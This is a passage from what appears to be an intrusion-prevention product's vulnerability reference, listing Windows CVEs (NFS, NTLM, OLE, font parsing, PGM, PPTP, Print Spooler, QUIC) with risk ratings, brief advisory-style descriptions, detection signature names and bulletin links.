Situation: SunRPC_TCP-Windows-NFS-CVE-2022-26937
References:
CVE-2022-26937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26937
ms22-may
http://technet.microsoft.com/security/bulletin/ms22-may
Back to top

Microsoft-Windows-NFS-CVE-2022-34715-RCE-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows Network File System.
Risk: High
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Windows
Software: Windows Server
Type: Buffer Overflow
Description: A vulnerability in Microsoft Windows Network File System, for Microsoft Windows Server 2022 and Microsoft Windows Server 2022 (Server Core installation), which allows remote attackers to execute arbitrary code by sending crafted requests, due to a out-of-bounds write to the ACE_Count field.
Situation: Generic_CS-Microsoft-Windows-NFS-CVE-2022-34715-RCE-Vulnerability
References:
CVE-2022-34715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34715
Back to top

Microsoft-Windows-NFS-Server-CVE-2020-17047

About this vulnerability: A vulnerability in the Microsoft Windows NFS server
Risk: Moderate
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists an input validation error in the Microsoft Windows NFS server.
Situation: SunRPC_TCP-Microsoft-Windows-NFS-Server-CVE-2020-17047
References:
CVE-2020-17047
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17047
ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov
Back to top

Microsoft-Windows-NFS-Server-CVE-2020-17051

About this vulnerability: A vulnerability in the Microsoft Windows NFS server
Risk: High
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists an input validation error in the Microsoft Windows NFS server.
Situation: Generic_UDP-Microsoft-Windows-NFS-Server-CVE-2020-17051
SunRPC_TCP-Microsoft-Windows-NFS-Server-CVE-2020-17051
References:
CVE-2020-17051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17051
ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov
Back to top

Microsoft-Windows-NFS-Server-CVE-2020-17056

About this vulnerability: A vulnerability in the Microsoft Windows NFS server
Risk: High
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1317-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists an input validation error in the Microsoft Windows NFS server.
Situation: Generic_UDP-Microsoft-Windows-NFS-Server-CVE-2020-17056
SunRPC_TCP-Microsoft-Windows-NFS-Server-CVE-2020-17056
SunRPC_TCP-Microsoft-Windows-NFS-Server-NLM-Information-Disclosure
References:
CVE-2020-17056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17056
ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov
Back to top

Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: Moderate
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Server
Type: Malfunction
Description: A denial-of-service vulnerability has been reported in Microsoft Windows NFS Server. The vulnerability is caused by a NULL pointer dereference that can occur when an invalid NFS file operation is requested on a read-only share. A remote attacker can exploit this vulnerability by sending a malicious NFS request. Successful exploitation can lead to a denial-of-service condition of the target system.
Situation: Analyzer-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Generic_CS-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Generic_SS-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
References:
CVE-2013-1281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1281
BID-57853
http://www.securityfocus.com/bid/57853
OSVDB-90129
http://www.osvdb.org/90129
MS13-014
http://technet.microsoft.com/security/bulletin/MS13-014
Back to top

Microsoft-Windows-NFS-Server-RCE-CVE-2021-26432

About this vulnerability: A vulnerability in the Microsoft Windows NFS server
Risk: High
First detected in: sgpkg-ips-1376-5242
Last changed: sgpkg-ips-1376-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An out-of-bound vulnerability exists in the Microsoft Windows NFS server. Successful exploitation may lead to remote code execution.
Situation: Generic_UDP-Microsoft-Windows-NFS-Server-RCE-CVE-2021-26432
References:
CVE-2021-26432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26432
ms21-aug
http://technet.microsoft.com/security/bulletin/ms21-aug
Back to top

Microsoft-Windows-NT-4.0-DHCP-Server-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows NT 4.0 DHCP Server
Risk: Moderate
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists a buffer overflow vulnerability in Windows NT Server 4.0.
Situation: BOOTP_CS-Microsoft-Windows-NT-4.0-DHCP-Server-Buffer-Overflow
References:
CVE-2009-0900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0900
Back to top

Microsoft-Windows-NTLM-Hash-Disclosure-Vulnerability-CVE-2025-21377

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows detected
Risk: High
First detected in: sgpkg-ips-1835-5242
Last changed: sgpkg-ips-1835-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An NTLM hash disclosure issue has been reported in Microsoft Windows.
Situation: File-Text_Suspicious-Internet-Shortcut-File
File-TextId_Suspicious-Internet-Shortcut-File
References:
CVE-2025-21377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21377
ms25-feb
http://technet.microsoft.com/security/bulletin/ms25-feb
Back to top

Microsoft-Windows-NTLM-Message-Integrity-Check-Tampering

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There has been reported a tampering vulnerability in the NTLM component of Microsoft Windows. Successful exploitation can lead in modification of the NTLM packet.
Situation: SMB-TCP_CHS-Microsoft-Windows-NTLM-Message-Integrity-Check-Tampering
References:
CVE-2019-1040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1040
Back to top

Microsoft-Windows-NTLM-Relay-CVE-2025-24054

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An NTLM relay vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper validation of search connector and library files. A remote attacker could exploit this vulnerability by enticing a target user in to downloading a crafted search connector or library description file. Successfully exploiting this vulnerability could result in the disclosure of a targeted user's NTLM hash.
Situation: File-TextId_Microsoft-Windows-NTLM-Relay-CVE-2025-24054
File-Name_Search-Connector-Description-File-Transfer
File-Name_Shell-Library-Description-File-Transfer
References:
CVE-2025-24054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24054
Back to top

Microsoft-Windows-Object-Packager-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Microsoft Windows Object Packager. The vulnerability is due to insufficient validation of certain files which can cause the OLE packager to download and execute arbitrary code. A remote attacker can exploit this vulnerability by enticing a user to download a maliciously crafted file. This can result in code execution in the context of the affected user.
Situation: File-OLE_Microsoft-Windows-Object-Packager-Remote-Code-Execution
File-TextId_Microsoft-Windows-Object-Packager-Remote-Code-Execution
References:
CVE-2014-4114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4114
BID-70419
http://www.securityfocus.com/bid/70419
OSVDB-113140
http://www.osvdb.org/113140
MS14-060
http://technet.microsoft.com/security/bulletin/MS14-060
Back to top

Microsoft-Windows-OLE-Automation-Heap-Overrun

About this vulnerability: A memory corruption vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows Vista; Windows XP
Software: <os>
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in the Microsoft Object Linking and Embedding (OLE) Automation component. The flaw is due to an integer overflow when handling crafted OLE stream data. Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the vulnerable system with privileges of the currently logged-in users.
Situation: HTTP_SS-Microsoft-OLE-Automation-Heap-Overrun
File-OLE_Microsoft-OLE-Automation-Heap-Overrun
References:
CVE-2007-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0065
BID-27661
http://www.securityfocus.com/bid/27661
MS08-008
http://technet.microsoft.com/security/bulletin/MS08-008
Back to top

Microsoft-Windows-OLE-CVE-2014-6332

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: File-Text_Microsoft-Windows-OLE-CVE-2014-6332
References:
CVE-2014-6332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332
MS14-064
http://technet.microsoft.com/security/bulletin/MS14-064
Back to top

Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A crafted OLE file can be used to gain code execution on the affected host.
Situation: File-OLE_Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution
File-RTF_Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution
References:
CVE-2016-0091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0091
MS16-030
http://technet.microsoft.com/security/bulletin/MS16-030
Back to top

Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper parsing of OLE objects can result in an attacker being able to execute code on Windows.
Situation: File-OLE_Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution
File-RTF_Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution
References:
CVE-2016-0092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0092
MS16-030
http://technet.microsoft.com/security/bulletin/MS16-030
Back to top

Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Windows OLE.
Situation: File-OLE_Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution
File-TextId_Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution
References:
CVE-2016-0153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0153
MS16-044
http://technet.microsoft.com/security/bulletin/MS16-044
Back to top

Microsoft-Windows-OLE-CVE-2017-8487-Global-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows Server 2003
Risk: Moderate
First detected in: sgpkg-ips-945-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Improper validation of files embedded in an OLE file causes a buffer overflow vulnerability in Windows XP and 2003. A successful attack allows execution of arbitrary code with user privileges.
Situation: File-Binary_Microsoft-Windows-OLE-CVE-2017-8487-Global-Buffer-Overflow
References:
CVE-2017-8487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8487
Back to top

Microsoft-Windows-OLE-Packer-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Office PowerPoint
Risk: Moderate
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper processing of files containing OLE objects. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted Microsoft Office file using the vulnerable software. This can result in arbitrary code execution on an affected machine with the privileges of the user.
Situation: File-OLE_Microsoft-Windows-OLE-Packer-Remote-Code-Execution
References:
CVE-2014-6352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352
BID-70690
http://www.securityfocus.com/bid/70690
OSVDB-113140
http://www.osvdb.org/113140
MS14-064
http://technet.microsoft.com/security/bulletin/MS14-064
Back to top

Microsoft-Windows-OpenType-Compact-Font-Format-Driver-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A code execution vulnerability exists in Microsoft Windows OpenType Compact Font Format (CFF) Driver. The vulnerability is due to the OpenType Compact Font Format (CFF) Driver not sufficiently validating the parameter values of specially crafted OpenType fonts. On Windows XP and Windows Server 2003 systems an attacker must have valid logon credentials in order to log on locally to exploit this vulnerability. On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 systems, an attacker could host a specially crafted OpenType font on a network share and then entice a user to navigate to the share in Windows Explorer. The vulnerability is triggered in the Details and Preview panes. In attack scenarios where code execution is successful the injected code will run in kernel mode. In situations where code execution fails, the vulnerable application may terminate abnormally.
Situation: File-Binary_Microsoft-Windows-OpenType-Compact-Font-Format-BOF
References:
CVE-2011-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0033
BID-46106
http://www.securityfocus.com/bid/46106
OSVDB-70821
http://www.osvdb.org/70821
MS11-007
http://technet.microsoft.com/security/bulletin/MS11-007
Back to top

Microsoft-Windows-OpenType-Font-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-833-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Windows detected
Situation: File-Binary_Microsoft-Windows-OpenType-Font-Memory-Corruption
References:
CVE-2016-7256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7256
MS16-132
http://technet.microsoft.com/security/bulletin/MS16-132
Back to top

Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Microsoft Windows Adobe Type Manager (ATM) library for OpenType Font parsing. The vulnerability is due to insufficient validation of a value while processing the Naming Table inside OpenType font. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected library, such as Windows FontViewer. Successful exploitation of this vulnerability would result in arbitrary code execution within the kernel. In case of an unsuccessful code injection attack, the affected system will crash, causing denial of service condition.
Situation: HTTP_SS-Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow
File-Binary_Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow
References:
CVE-2010-2740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2740
BID-43778
http://www.securityfocus.com/bid/43778
MS10-078
http://technet.microsoft.com/security/bulletin/MS10-078
Back to top

Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2
Software: <os>
Type: Buffer Overflow
Description: An integer overflow vulnerability exists in the Microsoft Windows OpenType Font (OTF) driver. The vulnerability is due to insufficient validation of a calculation involving a FontMatrix value while processing the Compact Font Format data inside an OpenType font. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected library, such as Windows FontViewer. Successful exploitation would possibly result in code execution in the security context of Ring 0 (kernel). If code execution is unsuccessful, the affected system will terminate and result in BSoD.
Situation: HTTP_SS_Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow
File-Binary_Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow
References:
CVE-2011-0034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0034
MS11-032
http://technet.microsoft.com/security/bulletin/MS11-032
Back to top

Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Microsoft Windows OpenType format driver. The vulnerability is due to insufficient validation of an integer value while processing the Font Table Directory inside OpenType font. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected font engine, such as Windows Font Viewer. Successful exploitation of this vulnerability would result in arbitrary code execution within the kernel. In case of an unsuccessful code injection attack, the affected system will crash, causing denial of service condition.
Situation: HTTP_SS-Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow
File-Binary_Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow
References:
CVE-2010-2741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2741
BID-43779
http://www.securityfocus.com/bid/43779
MS10-078
http://technet.microsoft.com/security/bulletin/MS10-078
Back to top

Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426
File-Exe_Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426
References:
CVE-2015-2426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2426
Back to top

Microsoft-Windows-PDF-Library-CVE-2016-0117-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-748-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a code execution vulnerability in Windows PDF library.
Situation: File-PDF_Microsoft-Windows-PDF-Library-CVE-2016-0117-Code-Execution
References:
CVE-2016-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0117
MS16-028
http://technet.microsoft.com/security/bulletin/MS16-028
Back to top

Microsoft-Windows-PDF-Library-CVE-2016-3319-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out-of-bounds write vulnerability in the PDF library in Microsoft Windows. A remote attacker could use this to execure arbitrary code on the affected system.
Situation: File-PDF_Microsoft-Windows-PDF-Library-CVE-2016-3319-Memory-Corruption
References:
CVE-2016-3319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3319
MS16-102
http://technet.microsoft.com/security/bulletin/MS16-102
Back to top

Microsoft-Windows-PDF-Library-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability has been reported in Microsoft Windows PDF library.
Situation: File-PDF_Microsoft-Windows-PDF-Library-Heap-Based-Buffer-Overflow
References:
CVE-2017-8728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8728
Back to top

Microsoft-Windows-PDF-Library-PostScript-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in the Microsoft Windows PDF library
Situation: File-PDF_Microsoft-Windows-PDF-Library-PostScript-Information-Disclosure
References:
CVE-2016-3374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3374
MS16-115
http://technet.microsoft.com/security/bulletin/MS16-115
Back to top

Microsoft-Windows-PE-File-DVRT-Parsing-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: A denial of service vulnerability has been reported in Microsoft Windows kernel. The vulnerability is triggered when handling Dynamic Value Relocation Table (DVRT) data inside PE files. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted PE file to the target. Successful exploitation of this vulnerability can result in Denial of Service of the target machine.
Situation: File-Exe_Microsoft-Windows-PE-File-DVRT-Parsing-Denial-Of-Service
References:
CVE-2023-24949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24949
ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may
Back to top

Microsoft-Windows-PE-File-Signature-Spoofing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1337-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Insufficient validation of PE file signatures causes a vulnerability in Windows.
Situation: File-Exe_Microsoft-Windows-PE-File-Signature-Spoofing-Vulnerability
File-Exe_Conflicting-Content-Type-HTA
References:
CVE-2020-1599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1599
Back to top

Microsoft-Windows-PGM-Handling-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: A remote code execution vulnerability has been reported for Pragmatic General Multicast in Microsoft Windows. The vulnerability is due to improper handling of the incoming PGM packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted RPC call to the victim server. Successful exploitation of this vulnerability can result in execution of arbitrary code within the kernel system.
Situation: IPv4_Microsoft-Windows-PGM-Handling-Remote-Code-Execution
References:
CVE-2023-28250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28250
Back to top

Microsoft-Windows-PGM-PARITY_PRM_TGS-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A remote code execution vulnerability has been reported for Pragmatic General Multicast in Microsoft Windows. The vulnerability is due to improper handling of the incoming PGM packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted RPC call to the victim server. Successful exploitation of this vulnerability can result in execution of arbitrary code within the kernel system.
Situation: IPv4_Microsoft-Windows-PGM-PARITY_PRM_TGS-Handling-Code-Execution
References:
CVE-2023-29363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29363
Back to top

Microsoft-Windows-PnP-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Microsoft Windows Plug and Play service (MS05-039)
Risk: High
First detected in: sgpkg-ips-34-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP SP1
Software: UPnP
Type: Buffer Overflow
Description: Microsoft Windows Plug and Play service contains a buffer overflow vulnerability. Remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: Generic_MSRPC-Windows-PnP-Buffer-Overflow
MSRPC-TCP_CPS-Windows-PnP-Buffer-Overflow
MSRPC-TCP_CPS-Windows-PnP-Service-Remote-Access
References:
CVE-2005-1983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1983
BID-14513
http://www.securityfocus.com/bid/14513
OSVDB-18605
http://www.osvdb.org/18605
MS05-039
http://technet.microsoft.com/security/bulletin/MS05-039
Back to top

Microsoft-Windows-PPTP-CVE-2022-23270

About this vulnerability: A vulnerability in the handling of PTPP
Risk: High
First detected in: sgpkg-ips-1465-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a unauthenticated remote code execution vulnerability in Windows Server PPTP. Successful exploitation could lead in arbitrary code execution.
Situation: PPTP_Windows-CVE-2022-23270
References:
CVE-2022-23270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23270
ms22-may
http://technet.microsoft.com/security/bulletin/ms22-may
Back to top

Microsoft-Windows-PPTP-Protocol-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A denial of service vulnerability has been reported in Microsoft Windows VPN component. The vulnerability is due to improper handling of PPTP packets. An remote, unauthenticated attacker could exploit these vulnerabilities by sending crafted requests. Successful exploitation results a in denial of service condition on the target system.
Situation: PPTP_Microsoft-Windows-PPTP-Protocol-Denial-Of-Service
References:
CVE-2022-23253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23253
Back to top

Microsoft-Windows-Pragmatic-General-Multicast-Allocatedatabuffer-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability has been reported for Pragmatic General Multicast in Microsoft Windows. The vulnerability is due to improper handling of the incoming PGM packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted PGM packet to the victim server. Successful exploitation of this vulnerability can result in arbitrary code execution in kernel space.
Situation: IPv4_Microsoft-Windows-Pragmatic-General-Multicast-Allocatedatabuffer-Use-After-Free
References:
CVE-2024-38140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38140
Back to top

Microsoft-Windows-Pragmatic-General-Multicast-Packet-Length-Integer-Underflow

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows detected
Risk: High
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A vulnerability in Pragmatic General Multicast in Microsoft Windows which allows remote attackers to cause a denial of service condition by sending specially crafted request to thet target server, due to improper handling of PGM packets.
Situation: IPv4_Microsoft-Windows-Pragmatic-General-Multicast-Packet-Length-Integer-Underflow
References:
CVE-2023-24940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24940
Back to top

Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1544-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability, publicly referred as PrintNightmare, in Windows Print Spooler. The vulnerability is due to a failure to restrict access to the functionality that allows adding printers and related drivers. This situation can be used to prevent untrusted sources from installing drivers.
Situation: SMB-TCP_Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527
MSRPC-TCP_CPS-Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527
References:
CVE-2021-34527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527
Back to top

Microsoft-Windows-Print-Spooler-Service-Buffer-Overflow-CVE-2009-0228

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Windows Print Spooler service. The vulnerability is due to lack of boundary check while processing RPC responses. A remote unauthenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code with System level privileges on the vulnerable host. If the code execution attempt is carried out successfully, the behaviour of the target host is dependent on the intention of the injected code. If the attacker aims for denial of service, it could terminate the Print Spooler service along with other Windows services hosted within the same process.
Situation: SMB-TCP_Microsoft-Windows-Print-Spooler-Service-Buffer-Overflow-CVE-2009-0228
References:
CVE-2009-0228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0228
BID-35206
http://www.securityfocus.com/bid/35206
OSVDB-54932
http://www.osvdb.org/54932
MS09-022
http://technet.microsoft.com/security/bulletin/MS09-022
Back to top

Microsoft-Windows-QUIC-Transport-Parameters-Handling-Resource-Exhaustion

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Platform: Windows
Software: <os>
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in Microsoft Windows QUIC. The vulnerability is due to improper handling of the incoming QUIC traffic. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted packet to the target server. Successful exploitation could result in the denial of service on the target machine.
Situation: HTTPS_CS-Microsoft-Windows-QUIC-Transport-Parameters-Handling-Resource-Exhaustion
References:
CVE-2023-36435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36435
ms23-oct
http://technet.microsoft.com/security/bulletin/ms23-oct
Back to top

Microsoft-Windows-QUIC-Version-Negotiation-Packet-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft .NET Core
Risk: High
First detected in: sgpkg-ips-1674-5242
Last changed: sgpkg-ips-1674-5242
Platform: Windows
Software: <os>
Type: Malfunction
